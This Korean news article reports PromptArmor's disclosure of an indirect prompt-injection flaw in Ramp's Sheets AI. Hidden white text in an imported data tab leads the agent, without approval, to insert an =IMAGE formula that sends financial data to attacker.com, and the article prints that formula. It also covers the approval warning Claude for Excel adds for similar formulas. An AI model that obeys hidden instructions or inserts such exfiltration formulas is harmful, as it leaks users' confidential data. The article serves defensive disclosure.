이번 주 보안 포럼에서는 엑셀 시트 하나 불러왔을 뿐인데 기업 기밀이 통째로 빠져나갈 수 있다는 시나리오가 뜨겁게 논의됐다. 외부에서 가져온 산업 성장률 통계 탭에 숨겨진 흰색 글씨가 AI를 조종해, 사용자가 모르는 사이 금융 모델 시트의 민감 정보를 외부 서버로 쏘아 올리는 상황이다. 개발자들은 AI가 편리하게 수식을 짜주는 기능을 넘어, 보이지 않는 곳에서 네트워크 요청을 보내는 통로가 될 수 있다는 점에 주목하고 있다.

Ramp Sheets AI의 데이터 탈취 경로와 타임라인

Ramp(기업용 지출 관리 플랫폼)의 Sheets AI(스프레드시트 자동화 AI 에이전트)는 사람이 개입하지 않고 시트를 수정하는 에이전트 기능을 제공한다. PromptArmor(AI 보안 취약점 분석 도구) 팀은 2026년 2월 19일에 이 취약점을 제보했고, 이후 2월 27일과 3월 13일에 걸쳐 후속 조치를 요청했다. Ramp 보안팀은 3월 14일에 보고서 수신을 확인했으며, 2026년 3월 16일 정오(동부 표준시)에 해당 문제가 해결되었음을 공식적으로 밝혔다. 이 취약점의 핵심은 간접 프롬프트 주입(외부 데이터에 숨겨진 명령어로 AI를 조종하는 공격)을 통해 AI가 악성 수식을 자동으로 삽입하게 만드는 것이다. 공격자는 다음과 같은 IMAGE 수식을 생성하도록 AI를 유도해 데이터를 탈취한다.

=IMAGE("https://attacker.com/visualize.png?{victim_sensitive_financial_data_here}")

이 수식은 외부 서버로 네트워크 요청을 보내면서 쿼리 스트링에 피해자의 민감한 금융 데이터를 포함시킨다. Ramp AI는 이 과정에서 사용자에게 어떠한 승인 절차도 요구하지 않았으며, 결과적으로 공격자의 서버 로그에는 피해자의 기밀 금융 데이터가 그대로 기록되었다.

수동 검토 시대와 AI 자동 삽입의 보안 격차

예전에는 사용자가 수식을 직접 입력하며 검토하는 과정이 필수적이었기에, 출처 불분명한 URL이 포함된 수식이 실행되려면 사용자의 명시적인 확인이 필요했다. 하지만 이번 사례처럼 AI가 수식을 자동으로 삽입하는 환경에서는 기존의 검토 단계가 완전히 생략된다. Anthropic(AI 모델 개발사)의 Claude for Excel(엑셀용 클로드)에서도 거의 동일한 위험이 발견된 바 있다. 다만 Anthropic은 대응 방식에서 차이를 보였다. 초기 버전의 Claude for Excel은 인간 개입(Human-in-the-loop, AI의 작업 결과물을 사람이 최종 승인하는 단계) 구조를 가졌음에도, 승인 프롬프트 내에서 악성 수식이 제대로 보이지 않아 보호 효과가 떨어지는 문제가 있었다. 이를 해결하기 위해 Anthropic은 외부 네트워크 트래픽을 유발하는 수식이 삽입될 때 빨간색 경고창을 띄우는 인터스티셜(중간 삽입 화면) 방식을 도입했다. 이제 사용자는 삽입될 전체 수식을 명확히 확인하고 위험을 인지한 상태에서만 실행할 수 있다.

개발자가 바로 체감하는 변화는 AI 에이전트에게 부여한 쓰기 권한이 곧 시스템 권한 탈취나 데이터 유출의 직접적인 벡터가 될 수 있다는 점이다. 수식 하나가 네트워크 요청을 보낼 수 있는 스프레드시트 환경에서 AI의 자율성은 편리함보다 치명적인 보안 구멍을 먼저 만든다. 특히 신뢰할 수 없는 외부 데이터셋을 AI가 읽고 처리하는 과정에서 발생하는 간접 프롬프트 주입은 기존의 입력값 검증 방식으로는 막기 어렵다. 결국 AI가 생성한 코드가 실행 환경에 반영되기 전, 실행 가능한 동작(네트워크 요청, 파일 수정 등)을 식별하고 사용자에게 경고하는 세밀한 가드레일 설계가 필수적이다.

AI 에이전트의 자율성은 이제 기능의 영역이 아니라 보안의 영역에서 다시 정의되어야 한다.